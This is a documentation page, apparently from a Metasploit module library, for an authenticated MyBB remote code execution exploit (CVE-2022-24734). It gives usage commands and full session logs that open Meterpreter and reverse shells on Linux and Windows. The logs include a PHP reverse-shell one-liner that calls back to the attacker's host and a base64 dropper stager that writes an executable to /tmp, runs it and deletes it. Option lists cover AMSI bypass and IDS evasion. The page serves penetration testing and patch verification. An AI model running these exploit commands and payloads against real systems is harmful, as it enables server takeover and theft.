MyBB Admin Control Code Injection RCE - Metasploit
This page contains detailed information about how to use the exploit/multi/http/mybb_rce_cve_2022_24734 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: MyBB Admin Control Code Injection RCE
Module: exploit/multi/http/mybb_rce_cve_2022_24734
Source code: modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb
Disclosure date: 2022-03-09
Last modification time: 2022-05-30 16:24:18 +0000
Supported architecture(s): php, cmd, x86, x64
Supported platform(s): Linux, PHP, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-24734
This exploit module leverages an improper input validation
vulnerability in MyBB prior to 1.8.30
to execute arbitrary
code in the context of the user running the application.
MyBB Admin Control setting page calls PHP eval
function
with an unsanitized user input. The exploit adds a new
setting, injecting the payload in the vulnerable field, and
triggers its execution with a second request. Finally, it
takes care of cleaning up and removes the setting. Note that
authentication is required for this exploit to work and the
account must have rights to add or update settings
(typically, myBB administrator role).
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/multi/http/mybb_rce_cve_2022_24734
msf exploit(mybb_rce_cve_2022_24734) > exploit
Required Options
RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
USERNAME: MyBB Admin CP username
PASSWORD: MyBB Admin CP password
Knowledge Base
Vulnerable Application
This exploit module leverages an improper input validation vulnerability in
MyBB prior to 1.8.30
to execute arbitrary code in the context of the user
running the application.
MyBB Admin Control setting page calls PHP eval
function with an unsanitized
user input. The exploit adds a new setting, injecting the payload in the
vulnerable field, and triggers its execution with a second request. Finally, it
takes care of cleaning up and removes the setting.
Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, myBB administrator role).
Installation Steps
Linux with Docker
- Use this
docket-compose.yml
file (see this):
services: mybb: image: mybb/mybb:1.8.29 volumes: - ${PWD}/mybb:/var/www/html:rw
nginx: image: nginx:mainline-alpine ports: - published: 8080 target: 80 volumes: - ${PWD}/nginx:/etc/nginx/conf.d:ro - ${PWD}/mybb:/var/www/html:ro
postgresql: environment: POSTGRES_DB: mybb POSTGRES_PASSWORD: changeme POSTGRES_USER: mybb image: postgres:14-alpine volumes: - ${PWD}/postgres/data:/var/lib/postgresql/data:rw
version: '3.8'
- Create `nginx/default.conf`
upstream mybb {
server mybb:9000 weight=5;
}
server { listen 80;
root /var/www/html;
index index.html index.php;
location / {
try_files $uri $uri/ /index.php?$args;
}
location ~ inc/ {
internal;
}
location ~ ^/(images|cache|jscripts|uploads)/ {
access_log off;
}
location ~ \.php$ {
try_files $uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)$;
fastcgi_pass mybb;
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
}
}
``
- Run
docker-compose up.
- Access the application at
http://127.0.0.1:8080/install` and finish the installation process.
Windows with Nginx, PHP and MySQL
- Install MySQL:
- Follow the installation process here
- Install PHP:
- Download PHP (Non Thread Safe) here
- Extract everything to
C:\php
- run:
cd C:\php set PHP_FCGI_CHILDREN=5 set PHP_FCGI_MAX_REQUESTS=500 php-cgi.exe -b 127.0.0.1:9999
Install Nginx:
- Download Nginx here
- Extract everything to
C:\nginx
Set the following options to
C:\nginx\nginx.conf
worker_processes auto; ... server { listen 80;root www; index index.html index.php;
location / { try_files $uri $uri/ /index.php?$args; }
location ~ inc/ { internal; }
location ~ ^/(images|cache|jscripts|uploads)/ { access_log off; }
location ~ .php$ { try_files $uri =404; fastcgi_split_path_info ^(.+.php)(/.+)$; fastcgi_pass 127.0.0.1:9999; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; } }
Run:
cd C:\nginx start nginx.exe
Install MyBB
- Follow the installation process here.
Verification Steps
- Install the application (see Installation Steps)
- Start msfconsole
- Do:
use exploit/multi/http/mybb_rce_cve_2022_24734
- Do:
run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>
- You should get a shell.
- Try again with a different targets
Options
USERNAME
The username of a privileged MyBB account. It must have rights to add or update setting (usually with the administrator role)
PASSWORD
The password of the MyBB account.
Scenarios
Windows (target 0 - PHP)
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.1.215
[*] Meterpreter session 1 opened (192.168.1.44:4444 -> 192.168.1.215:63777) at 2022-05-23 15:41:40 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
meterpreter > sysinfo
Computer : DC02
OS : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
Meterpreter : php/windows
Linux (target 0 - PHP)
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.0.48
[*] Meterpreter session 2 opened (192.168.0.48:4444 -> 192.168.0.48:50029) at 2022-05-23 15:41:58 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
meterpreter > sysinfo
Computer : e087259940a8
OS : Linux e087259940a8 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux
Linux (target 1 - Unix (In-Memory))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 1
target => 1
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.0.48:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Started reverse SSL handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 3 opened (192.168.0.48:4444 -> 192.168.0.48:50151) at 2022-05-23 15:42:58 +0200
ls
backups
inc
index.php
jscripts
modules
styles
^C
Abort session 3? [y/N] y
Linux (target 2 - linux (Dropper))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgBE2gCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/UAznK.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/jHFeb' < '/tmp/UAznK.b64' ; chmod +x '/tmp/jHFeb' ; '/tmp/jHFeb' ; rm -f '/tmp/jHFeb' ; rm -f '/tmp/UAznK.b64'"]
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.0.48
[*] Meterpreter session 4 opened (192.168.0.48:4444 -> 192.168.0.48:50213) at 2022-05-23 15:43:26 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > sysinfo
Computer : 172.18.0.4
OS : (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
Windows (target 3 - Windows (In-Memory))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
target => 4
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Powershell command length: 4160
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Meterpreter session 6 opened (192.168.1.44:4444 -> 192.168.1.215:59025) at 2022-05-30 15:58:01 +0200
meterpreter > sysinfo
Computer : DC02
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MYLAB
Logged On Users : 8
Meterpreter : x86/windows
Windows (target 4 - Windows (Dropper))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
target => 5
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
...
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Meterpreter session 7 opened (192.168.1.44:4444 -> 192.168.1.215:64264) at 2022-05-23 15:45:07 +0200
meterpreter > sysinfo
Computer : DC02
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MYLAB
Logged On Users : 8
Meterpreter : x86/windows
Go back to menu.
Msfconsole Usage
Here is how the multi/http/mybb_rce_cve_2022_24734 exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/mybb_rce_cve_2022_24734
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show info
Name: MyBB Admin Control Code Injection RCE
Module: exploit/multi/http/mybb_rce_cve_2022_24734
Platform: PHP, Unix, Linux, Windows
Arch: php, cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-03-09
Provided by:
Cillian Collins
Altelus
Christophe De La Fuente
Module side effects:
config-changes
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 PHP
1 Unix (In-Memory)
2 Linux (Dropper)
3 Windows (In-Memory)
4 Windows (Dropper)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes MyBB Admin CP password
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS yes The target host(s), see https://github.com/rapid7/metaspl
oit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This mu
st be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly gen
erated)
TARGETURI / yes The URI of the MyBB application
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes MyBB Admin CP username
VHOST no HTTP server virtual host
Payload information:
Description:
This exploit module leverages an improper input validation
vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in
the context of the user running the application. MyBB Admin Control
setting page calls PHP `eval` function with an unsanitized user
input. The exploit adds a new setting, injecting the payload in the
vulnerable field, and triggers its execution with a second request.
Finally, it takes care of cleaning up and removes the setting. Note
that authentication is required for this exploit to work and the
account must have rights to add or update settings (typically, myBB
administrator role).
References:
https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f
https://www.zerodayinitiative.com/advisories/ZDI-22-503/
https://github.com/Altelus1/CVE-2022-24734
https://nvd.nist.gov/vuln/detail/CVE-2022-24734
Module Options
This is a complete list of options available in the multi/http/mybb_rce_cve_2022_24734 exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show options
Module options (exploit/multi/http/mybb_rce_cve_2022_24734):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes MyBB Admin CP password
Proxies no A proxy chain of format type:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasp
loit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This m
ust be an address on the local machine or 0.0.0.0 to lis
ten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly ge
nerated)
TARGETURI / yes The URI of the MyBB application
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes MyBB Admin CP username
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
Advanced Options
Here is a complete list of advanced options supported by the multi/http/mybb_rce_cve_2022_24734 exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show advanced
Module advanced options (exploit/multi/http/mybb_rce_cve_2022_24734):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: au
to, bourne, debug_asm, debug_write,
echo, printf, vbs, vbs_adodb, certut
il, tftp, wget, curl, fetch, lwprequ
est, psh_invokewebrequest)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
ContextInformationFile no The information file that contains c
ontext information
DOMAIN WORKSTATION yes The domain to use for Windows authen
tication
DigestAuthIIS true no Conform to IIS, should work for most
servers. Only set to false for non-
IIS servers
DisablePayloadHandler false no Disable the handler code for the sel
ected payload
EXE::Custom no Use custom exe instead of automatica
lly generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of re
gular payload exe
EXE::FallBack false no Use the default template in case the
specified one is missing
EXE::Inject false no Set to preserve the original EXE fun
ction
EXE::OldMethod false no Set to use the substitution EXE gene
ration method.
EXE::Path no The directory in which to look for t
he executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding
payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint ve
rification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for aut
hentication
HttpRawHeaders no Path to ERB-templatized raw headers
to append to existing headers
HttpTrace false no Show the raw HTTP requests and respo
nses
HttpTraceColors red/blu no HTTP request and response colors for
HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for aut
hentication
ListenerBindAddress no The specific IP address to bind to i
f different from SRVHOST
ListenerBindPort no The port to bind to if different fro
m SRVPORT
ListenerComm no The specific communication channel t
o use for this service
MSI::Custom no Use custom msi instead of automatica
lly generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of re
gular payload msi
MSI::Path no The directory in which to look for t
he msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (ele
vation to SYSTEM if accepted)
Powershell::encode_fin false yes Encode final payload for -EncodedCom
al_payload mand
Powershell::encode_inn false yes Encode inner payload for -EncodedCom
er_payload mand
Powershell::exec_in_pl false yes Produce PSH without executable wrapp
ace er
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: n
et, reflection, old, msil)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninterac true yes Execute powershell without interacti
tive on
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_pr auto yes Prepend AMSI/SBL bypass (Accepted: a
otections_bypass uto, true, false)
Powershell::prepend_sl no Prepend seconds of sleep
eep
Powershell::remove_com false yes Produce script calling powershell di
spec rectly
Powershell::strip_comm true yes Strip comments
ents
Powershell::strip_whit false yes Strip whitespace
espace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_doubl true yes Wraps the -Command argument in singl
e_quotes e quotes
SSLCipher no String for SSL cipher spec - "DHE-RS
A-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndicatio no SSL/TLS Server Name Indication (SNI)
n
SSLVersion Auto yes Specify the version of SSL/TLS to be
used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked fo
r one
URIHOST no Host to use in URI (useful for tunne
ls)
URIPORT no Port to use in URI (useful for tunne
ls)
UserAgent Mozilla/5.0 (iPad; CPU no The User-Agent header to use for all
OS 15_3_1 like Mac OS requests
X) AppleWebKit/605.1.
15 (KHTML, like Gecko)
Version/15.2 Mobile/1
5E148 Safari/604.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this modul
e
WfsDelay 2 no Additional delay in seconds to wait
for a session
Payload advanced options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session cr
eation.
AutoSystemInfo true yes Automatically capture system information on
initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and
unhook the process
AutoVerifySessionTimeo 30 no Timeout period to wait for session validati
ut on to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexad
ecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM fo
rmat, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creatio
n (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLoggin no The Meterpreter debug logging configuration
g , see https://github.com/rapid7/metasploit-
framework/wiki/Meterpreter-Debugging-Meterp
reter-Sessions
PayloadProcessCommandL no The displayed command line that will be use
ine d by the payload
PayloadUUIDName no A human-friendly name to reference this uni
que payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PU
ID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload
UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register ge
nerated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingback
s
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specifi
ed. Connect back will NOT go through proxy
but directly to LHOST
ReverseListenerBindAdd no The specific IP address to bind to on the l
ress ocal system
ReverseListenerBindPor no The port to bind to on the local system if
t different from LPORT
ReverseListenerComm no The specific communication channel to use f
or this listener
ReverseListenerThreade false yes Handle every connection in a new thread (ex
d perimental)
SessionCommunicationTi 300 no The number of seconds of no activity before
meout this session should be killed
SessionExpirationTimeo 604800 no The number of seconds before this session s
ut hould be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on n
etwork failure
SessionRetryWait 10 no Number of seconds to wait between reconnect
attempts
StageEncoder no Encoder to use if EnableStageEncoding is se
t
StageEncoderSaveRegist no Additional registers to preserve in the sta
ers ged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected Sta
geEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry
if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager be
tween reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/mybb_rce_cve_2022_24734 module can exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show targets
Exploit targets:
Id Name
-- ----
0 PHP
1 Unix (In-Memory)
2 Linux (Dropper)
3 Windows (In-Memory)
4 Windows (Dropper)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/mybb_rce_cve_2022_24734 exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
5 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
6 payload/php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)
7 payload/php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6
8 payload/php/bind_php normal No PHP Command Shell, Bind TCP (via PHP)
9 payload/php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6
10 payload/php/download_exec normal No PHP Executable Download and Execute
11 payload/php/exec normal No PHP Execute Command
12 payload/php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager
13 payload/php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6
14 payload/php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
15 payload/php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support
16 payload/php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager
17 payload/php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager
18 payload/php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline
19 payload/php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)
20 payload/php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/mybb_rce_cve_2022_24734 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Tran
sfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via co
ntent encoding (Accepted: none, gzip, defla
te)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP header
s
HTTP::method_random_ca false no Use random casing for the HTTP method
se
HTTP::method_random_in false no Use a random invalid, HTTP method for reque
valid st
HTTP::method_random_va false no Use a random, but valid, HTTP method for re
lid quest
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP r
equest
HTTP::pad_fake_headers 0 no How many fake headers to insert into the HT
_count TP request
HTTP::pad_get_params false no Insert random, fake query string variables
into the request
HTTP::pad_get_params_c 16 no How many fake query string variables to ins
ount ert into the request
HTTP::pad_method_uri_c 1 no How many whitespace characters to use betwe
ount en the method and uri
HTTP::pad_method_uri_t space no What type of whitespace to use between the
ype method and uri (Accepted: space, tab, apach
e)
HTTP::pad_post_params false no Insert random, fake post variables into the
request
HTTP::pad_post_params_ 16 no How many fake post variables to insert into
count the request
HTTP::pad_uri_version_ 1 no How many whitespace characters to use betwe
count en the uri and version
HTTP::pad_uri_version_ space no What type of whitespace to use between the
type uri and version (Accepted: space, tab, apac
he)
HTTP::server_name Apache yes Configures the Server header of all outgoin
g replies
HTTP::uri_dir_fake_rel false no Insert fake relative directories into the u
ative ri
HTTP::uri_dir_self_ref false no Insert self-referential directories into th
erence e uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-no
rmal, hex-noslashes, hex-random, hex-all, u
-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../
../)
HTTP::uri_fake_params_ false no Add a fake start of params to the URI (eg:
start /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslas false no Use back slashes instead of forward slashes
hes in the uri
HTTP::version_random_i false no Use a random invalid, HTTP version for requ
nvalid est
HTTP::version_random_v false no Use a random, but valid, HTTP version for r
alid equest
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = di
sable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <PEER> - Could not connect to web service - no response
- <PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>
- <PEER> - Cannot find MyBB forum running at <TARGET_URI.PATH>
- <PEER> - Could not connect to web service - no response
- <PEER> - Invalid credentials
- <PEER> - Could not connect to web service - no response
- <PEER> - Supplied user doesn't have the rights to add a setting
- User session is not valid anymore. Trying to login again to cleanup
- <PEER> - URI not found in `Modify Settings` page - cannot cleanup
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
116: res = send_request_cgi({
117: 'uri' => normalize_uri(target_uri.path, 'index.php'),
118: 'method' => 'GET',
119: 'vars_get' => { 'intcheck' => 1 }
120: })
121: return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
122: return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
123:
124: # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
125: unless res.body.include?('MYBB')
126: return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>
Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:
117: 'uri' => normalize_uri(target_uri.path, 'index.php'),
118: 'method' => 'GET',
119: 'vars_get' => { 'intcheck' => 1 }
120: })
121: return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
122: return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
123:
124: # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
125: unless res.body.include?('MYBB')
126: return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
127: end
<PEER> - Cannot find MyBB forum running at <TARGET_URI.PATH>
Here is a relevant code snippet related to the "<PEER> - Cannot find MyBB forum running at <TARGET_URI.PATH>" error message:
121: return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
122: return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
